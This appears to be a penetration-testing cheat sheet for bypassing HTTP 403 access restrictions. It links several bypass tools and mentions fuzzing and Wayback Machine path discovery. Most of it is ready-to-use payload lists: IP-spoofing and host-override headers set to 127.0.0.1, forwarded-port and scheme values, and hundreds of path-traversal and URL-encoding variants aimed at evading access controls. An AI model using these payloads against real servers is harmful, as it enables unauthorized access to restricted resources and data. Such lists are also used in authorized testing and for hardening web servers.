https :// github .com / iamj0ker / bypass - 403
https :// github .com / channyein1337 / 403 - bypass / blob / main / 403 - bypass .py
https :// github .com / nico989 / B1pass3r
https :// github .com / Dheerajmadhukar / 4 - ZERO - 3
bypass by fuzz or brute force
you can use dirsearch tool or discovery content path
search in wayback about this subdomain you can find any important path
bypass by header names
Base - Url
Client - IP
Http - Url
Proxy - Host
Proxy - Url
Real - Ip
Redirect
Referer
Referrer
Refferer
Request - Uri
Uri
Url
X - Client - IP
X - Custom - IP - Authorization
X - Forward - For
X - Forwarded - By
X - Forwarded - For - Original
X - Forwarded - For
X - Forwarded - Host
X - Forwarded - Port
X - Forwarded - Port
X - Forwarded - Port
X - Forwarded - Port
X - Forwarded - Port
X - Forwarded - Scheme
X - Forwarded - Scheme
X - Forwarded - Server
X - Forwarded
X - Forwarder - For
X - Host
X - Http - Destinationurl
X - Http - Host - Override
X - Original - Remote - Addr
X - Original - Url
X - Originating - IP
X - Proxy - Url
X - Real - Ip
X - Remote - Addr
X - Remote - IP
X - Rewrite - Url
X - True - IP
bypass by header payloads
Base - Url : 127.0 .0.1
Client - IP : 127.0 .0.1
Http - Url : 127.0 .0.1
Proxy - Host : 127.0 .0.1
Proxy - Url : 127.0 .0.1
Real - Ip : 127.0 .0.1
Redirect : 127.0 .0.1
Referer : 127.0 .0.1
Referrer : 127.0 .0.1
Refferer : 127.0 .0.1
Request - Uri : 127.0 .0.1
Uri : 127.0 .0.1
Url : 127.0 .0.1
X - Client - IP : 127.0 .0.1
X - Custom - IP - Authorization : 127.0 .0 .1
X - Forward - For : 127.0 .0.1
X - Forwarded - By : 127.0 .0.1
X - Forwarded - For - Original : 127.0 .0 .1
X - Forwarded - For : 127.0 .0.1
X - Forwarded - Host : 127.0 .0.1
X - Forwarded - Port : 443
X - Forwarded - Port : 4443
X - Forwarded - Port : 80
X - Forwarded - Port : 8080
X - Forwarded - Port : 8443
X - Forwarded - Scheme : http
X - Forwarded - Scheme : https
X - Forwarded - Server : 127.0 .0 .1
X - Forwarded : 127.0 .0 .1
X - Forwarder - For : 127.0 .0.1
X - Host : 127.0 .0.1
X - Http - Destinationurl : 127.0 .0 .1
X - Http - Host - Override : 127.0 .0 .1
X - Original - Remote - Addr : 127.0 .0.1
X - Original - Url : 127.0 .0.1
X - Originating - IP : 127.0 .0.1
X - Proxy - Url : 127.0 .0.1
X - Real - Ip : 127.0 .0.1
X - Remote - Addr : 127.0 .0.1
X - Remote - IP : 127.0 .0.1
X - Rewrite - Url : 127.0 .0.1
X - True - IP : 127.0 .0.1
#
#?
% 09
% 09 % 3 b
% 09. .
% 09 ;
% 20
% 23
% 23 % 3 f
% 252 f % 252 f
% 252 f /
% 2 e % 2 e
% 2 e % 2 e /
% 2 f
% 2 f % 20 % 23
% 2 f % 23
% 2 f % 2 f
% 2 f % 3 b % 2 f
% 2 f % 3 b % 2 f % 2 f
% 2 f % 3 f
% 2 f % 3 f /
% 2 f /
% 2 f ;?
% 2 f ?;
% 3 b
% 3 b % 09
% 3 b % 2 f % 2 e % 2 e
% 3 b % 2 f % 2 e % 2 e % 2 f % 2 e % 2 e % 2 f % 2 f
% 3 b % 2 f % 2 e .
% 3 b % 2 f ..
% 3 b / % 2 e % 2 e / ..% 2 f % 2 f
% 3 b / % 2 e .
% 3 b / % 2 f % 2 f ../
% 3 b / ..
% 3 b // % 2 f ../
% 3 f % 23
% 3 f % 3 f
% 3 f .php
..
..% 00 /
..% 00 / ;
..% 00 ;/
..% 09
..% 0 d /
..% 0 d / ;
..% 0 d ;/
..% 5 c /
..% ff /
..% ff / ;
..% ff ;/
../
..;% 00 /
..;% 0 d /
..;% ff /
..;\\
..;\\;
..\\
..\\;
.html
.json
/
/ #
/ % 20
/ % 20 #
/ % 20 % 23
/ % 23
/ % 252 e % 252 e % 252 f /
/ % 252 e % 252 e % 253 b /
/ % 252 e % 252 f /
/ % 252 e % 253 b /
/ % 252 e /
/ % 252 f
/ % 2 e % 2 e
/ % 2 e % 2 e % 2 f /
/ % 2 e % 2 e % 3 b /
/ % 2 e % 2 e /
/ % 2 e % 2 f /
/ % 2 e % 3 b /
/ % 2 e % 3 b //
/ % 2 e /
/ % 2 e //
/ % 2 f
/ % 3 b /
/ ..
/ ..% 2 f
/ ..% 2 f ..% 2 f
/ ..% 2 f ..% 2 f ..% 2 f
/ ../
/ ../ ../
/ ../ ../ ../
/ ../ ../ ..//
/ ../ ..//
/ ../ ..// ../
/ ../ ..;/
/ ../ ./ ../
/ ../ .;/ ../
/ ..//
/ ..// ../
/ ..// ../ ../
/ ..// ..;/
/ ../ ;/
/ ../ ;/ ../
/ ..;% 2 f
/ ..;% 2 f ..;% 2 f
/ ..;% 2 f ..;% 2 f ..;% 2 f
/ ..;/
/ ..;/ ../
/ ..;/ ..;/
/ ..;//
/ ..;// ../
/ ..;// ..;/
/ ..;/ ;/
/ ..;/ ;/ ..;/
/ ./
/ .//
/ .;/
/ .;//
//
// ..
// ../ ../
// ..;
// ./
// .;/
// / ..
// / ../
// / ..//
// / ..;
// / ..;/
// / ..;//
// ;/
/ ;/
/ ;//
/ ;?
/ ;x
/ ;x /
/ ?
/ ?;
/ x / ../
/ x / ..//
/ x / ../ ;/
/ x / ..;/
/ x / ..;//
/ x / ..;/ ;/
/ x // ../
/ x // ..;/
/ x / ;/ ../
/ x / ;/ ..;/
;
;% 09
;% 09. .
;% 09. .;
;% 09 ;
;% 2 F ..
;% 2 f % 2 e % 2 e
;% 2 f % 2 e % 2 e % 2 f % 2 e % 2 e % 2 f % 2 f
;% 2 f % 2 f / ../
;% 2 f ..
;% 2 f ..% 2 f % 2 e % 2 e % 2 f % 2 f
;% 2 f ..% 2 f ..% 2 f % 2 f
;% 2 f ..% 2 f /
;% 2 f ..% 2 f / ..% 2 f
;% 2 f ..% 2 f / ../
;% 2 f ../ % 2 f ..% 2 f
;% 2 f ../ % 2 f ../
;% 2 f ..// ..% 2 f
;% 2 f ..// ../
;% 2 f ..// /
;% 2 f ..// / ;
;% 2 f ..// ;/
;% 2 f ..// ;/ ;
;% 2 f ../ ;//
;% 2 f ../ ;/ ;/
;% 2 f ../ ;/ ;/ ;
;% 2 f ..;// /
;% 2 f ..;// ;/
;% 2 f ..;/ ;//
;% 2 f / % 2 f ../
;% 2 f // ..% 2 f
;% 2 f // ../
;% 2 f // ..;/
;% 2 f / ;/ ../
;% 2 f / ;/ ..;/
;% 2 f ;// ../
;% 2 f ;/ ;/ ..;/
;/ % 2 e % 2 e
;/ % 2 e % 2 e % 2 f % 2 f
;/ % 2 e % 2 e % 2 f /
;/ % 2 e % 2 e /
;/ % 2 e .
;/ % 2 f % 2 f ../
;/ % 2 f / ..% 2 f
;/ % 2 f / ../
;/ .% 2 e
;/ .% 2 e / % 2 e % 2 e / % 2 f
;/ ..
;/ ..% 2 f
;/ ..% 2 f % 2 f ../
;/ ..% 2 f ..% 2 f
;/ ..% 2 f /
;/ ..% 2 f //
;/ ../
;/ ../ % 2 f /
;/ ../ ../
;/ ../ ..//
;/ ../ ./ ../
;/ ../ .;/ ../
;/ ..//
;/ ..// % 2 e % 2 e /
;/ ..// % 2 f
;/ ..// ../
;/ ..// /
;/ ../ ;/
;/ ../ ;/ ../
;/ ..;
;/ .;.
;// % 2 f ../
;// ..
;// ../ ../
;// / ..
;// / ../
;// / ..//
;?
;x
;x /
;x ;
?
?#
?.php
?;
??
// /
/ % 2 f /
// % 2 f
% 2 f / % 2 f
% 2 f % 2 f % 2 f
% 2 f //